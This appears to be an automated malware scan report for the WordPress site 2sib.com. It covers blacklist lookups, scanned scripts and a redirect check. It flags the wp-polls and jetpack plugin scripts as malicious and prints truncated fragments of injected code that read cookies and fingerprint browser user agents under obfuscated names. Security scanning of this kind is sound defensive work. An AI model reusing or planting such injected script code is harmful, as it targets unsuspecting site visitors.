Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=2sib.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://2sib.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.2sib.com/ | 200 OK Content-Length: 81355 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: itclips.net <!DOCTYPE html>
<html dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <title>دÙسÛب - اپÙÛÚ©ÛØ´ÙâÙØ§Û Ø¢ÛÙÙ٠٠آÛپد</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.2sib.com/xmlrpc.php" /> <!--[if lt ...[4168 bytes skipped]... | ||
http://www.2sib.com/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-content/themes/jarida/js/tie-scripts.js?ver=4.0 | 200 OK Content-Length: 65802 Content-Type: text/javascript | clean |
http://hst.tradedoubler.com/file/20649/contextual/cx2.js | 200 OK Content-Length: 11121 Content-Type: application/javascript | clean |
http://www.2sib.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.67 | 200 OK Content-Length: 5244 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo function poll_process_success(b){jQuery(document).ready(function(a){a("#polls-"+poll_id).replaceWith(b);pollsL10n.show_loading&&a("#polls-"+poll_id+"-loading").hide();pollsL10n.show_fading&&a("#polls-"+poll_id).fadeTo("def",1);set_is_being_voted(!1)})}function set_is_being_voted(b){is_being_voted=b}; Antivirus reports:
| ||
http://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201438 | 200 OK Content-Length: 9301 Content-Type: application/x-javascript | clean |
http://s.gravatar.com/js/gprofiles.js?ver=2014Sepaa | 200 OK Content-Length: 21442 Content-Type: application/x-javascript | clean |
http://www.2sib.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.0 | 200 OK Content-Length: 3209 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var resizegood = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return resizegood ? decodeURIComponent(resizegood[1]) : undefined; } function Lightebrothermind() { var Litresbool = navigator.userAgent; var Smiledbob = (Litresbool.indexOf("IEMobile") > -1 || Litresbool.indexOf("Chrome") > -1 || Litresbool.indexOf("Windows NT 6.3") > -1 || Litresbo return WPGroHo.renderers[key]( data[key], hash, id, key ); } jQuery( '#' + id ).find( 'h4' ).after( jQuery( '<p class="grav-extra ' + key + '" />' ).html( data[key] ) ); } } }, WPGroHo ); jQuery( document ).ready( function() { Gravatar.profile_cb = function( h, d ) { WPGroHo.syncProfileData( h, d ); }; Gravatar.my_hash = WPGroHo.my_hash; Gravatar.init( 'body', '#wpadminbar' ); } ); Antivirus reports:
| ||
http://www.2sib.com/wp-content/plugins/app-store-assistant/js_functions/lightbox/js/lightbox-2.6.min.js | 200 OK Content-Length: 7389 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/ui/jquery.ui.core.min.js?ver=1.10.4 | 200 OK Content-Length: 4289 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/ui/jquery.ui.widget.min.js?ver=1.10.4 | 200 OK Content-Length: 6521 Content-Type: text/javascript | clean |
http://www.2sib.com/wp-includes/js/jquery/ui/jquery.ui.accordion.min.js?ver=1.10.4 | 200 OK Content-Length: 8366 Content-Type: text/javascript | clean |
http://stats.wp.com/e-201438.js | 200 OK Content-Length: 824 Content-Type: application/x-javascript | clean |
http://www.2sib.com/iphone-6-release-date-news-and-rumors/ | 200 OK Content-Length: 84373 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: itclips.net <!DOCTYPE html>
<html dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb#" prefix="og: http://ogp.me/ns#"> <head> <meta charset="UTF-8" /> <title>Ø¢ÛÙÙÙ Û¶ تارÛØ® عرضÙØ Ø§Ø®Ø¨Ø§Ø± ٠شاÛعات</title> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="http://www.2sib.com/xmlrpc.php" /> <meta prop ...[4109 bytes skipped]... |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 2sib.com
Result:
GET / HTTP/1.1
Host: 2sib.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: 2sib.com
Referer: http://www.google.com/search?q=2sib.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: 2sib.com
Referer: http://www.google.com/search?q=2sib.com
Result:
The result is similar to the first query. There are no suspicious redirects found.